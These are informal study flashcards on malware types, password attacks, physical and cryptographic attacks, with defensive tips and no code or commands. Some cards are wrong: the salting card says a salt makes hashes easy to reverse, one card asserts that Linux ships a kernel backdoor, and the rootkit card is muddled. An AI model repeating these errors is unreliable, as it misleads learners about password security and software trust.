1.2 Malware & common attacks Flashcards
What is a malware?
malicious software, can aim at gather information or take control of your computer and make it a botnet
What are the different type of malware?
- viruses
- crypto-malware
- worms
- trojan horse
- rootkit
- keylogger
- adware/spyware
- botnet
How to get a malware?
can be dl via a click on an email, or via web page pop up, or via a vunerability
What is a virus?
a malware that can reproduce itself through file systems or network
What is the different virus type ?
- program viruses (in applications)
- boot sector viruses (when the OS boot)
- script viruses
- macro viruses (inside a macro in microsoft office)
- fileless virus
What is a fileless virus?
type of malware that uses native, legitimate tools built into a system to execute a cyber attack. Unlike traditional malware, fileless malware does not require an attacker to install any code on a target’s system, making it hard to detect.
How fileless malware work?
1/user click on malicious website link
2/ website exploit a vulnerability
3/ launch powershell and dl payloads in RAM
4/ run powershell script and exec in memory
What is a worm?
type of malware that self replicated and self spread through a network
How a worm can be detected?
by a firewalls and IDS/IPS before the infection, the worm should be signature based
What is a ransomware?
malware that employs encryption to hold a victim’s information at ransom
What is crypto malware?
same as ransomware, the data are encrypted and the ransom needs to be paid if you want the data back
How to protect against ransomware
- have a backup
- update OS
- update apps
- update antivirus/malware to get the latest signature
what is trojan horse?
software that pretend to be something else and in reality you are installing a malware, once it is inside in can open backdoor or dl file etc
what is a PUP
Potentially Uwanted Software that can be dl by a trojan (eg agressive browser toolbar, unwanted ad etc)
what is a backdoor?
can be open thans to a malware. It is a undocumented way of gaining access to a computer without having to redo the whole attack for the hacker. SOme software like Linux includ backdoor to the kernel
How to prevent a trojan?
- update antivirus with the lates signature
- have a backup
- don’t click on unknown link
What is a rootkit?
type of malware that give access and modify file on the kernel (and not the OS), it can be invisible
Is a rootkit can be identified?
yes some antivirus can and software that secure boot exists
what is a spyware?
type of malware that steals sensitive info and gather data. It can analyse the activity on internet and use keylogger to capture credential once the victim log in a website. It can be install via a trojan
how to protect against spyware/adware?
- antivirus/anti malware with latest signature
- know exactly what you are installing
- do backups
What are bots?
type of malware that infects a device to make it a bot remotely contolled by the hacker
what is botnets ?
a group of bots working toghether. It can be used to do DDos, relay spam, proxy network traffic
How to prevent for bot ?
- update OS
- update antivirus/malware
- identify an existing infection
- prevent command and control (block at firewall, IPS)
what is a logic bomb?
type of malware that is triggered when a logical condition is met such as after a number of transactions have been processed, or on a specific date. Difficult to spot cos logic bomb can delete themselves and no signature predefined in antivirus
How to prevent from logic bomb?
- Formal change control & procedure (is there a process in place for change in the server?)
-host based intrusion dection - constant auditing of systems
What is the best way to store a password?
by hashing that it irreversible
what is a spraying attack (this is not malware)
when an attacker uses common passwords to attempt to access several accounts on one domain. Using a list of common weak passwords, such as 123456 or password1, an attacker can potentially access hundreds of accounts in one attack. it avoid the account to be locked
What is a bruteforce attack?
try every possible password combination until the hash matches the password’ hash. It can be detected and the account can be locked
What is a dictionnarry attack ?
use a dictionary to find common words, many wordlists are available on the internet
What is a rainbow table?
an optimized, pre-built set of hashes stored in a table and help to find hashes corresponding to a password
what is “adding a salt”
it refers to adding random data to a password when hashing so that it can be easily unshash via a rainbow table, it slow the bruteforce attack (e.g. password +MeNvg)
What are the different type of physical attacks?
- malicious USB cable: cable which perform unwanted function once connected (dl malware, data exfiltration, gps tracking etc). Often detected as mouse or keyboard by computer
- malicious usb flash drive: USB infected with malware that are dl once connected to pc
- skimming: stealing credit card info during a normal transaction
- card cloning: cloning a credit card
what is poisoning the training data attack?
it is a type of attack directed to machine learning. As ML require a lot to data for the AI to function,, an attacer can confuse the AI by sending modified data
What is the difference between cloud based and on premises attack?
- cloud: security is centralized and costs less
- onpremises: security and infra cost on the client
what are cryptographic attacks?
- collision: 2 plaintext created the same hash value
- downgrade attack: scenario in which a malicious actor attempts to force a server or client to use a lower version of a cryptographic protocol (such as TLS or SSL), a cipher suite (such as an export-grade cipher, instead of a standard one), or a connection type (HTTP, instead of HTTPS)
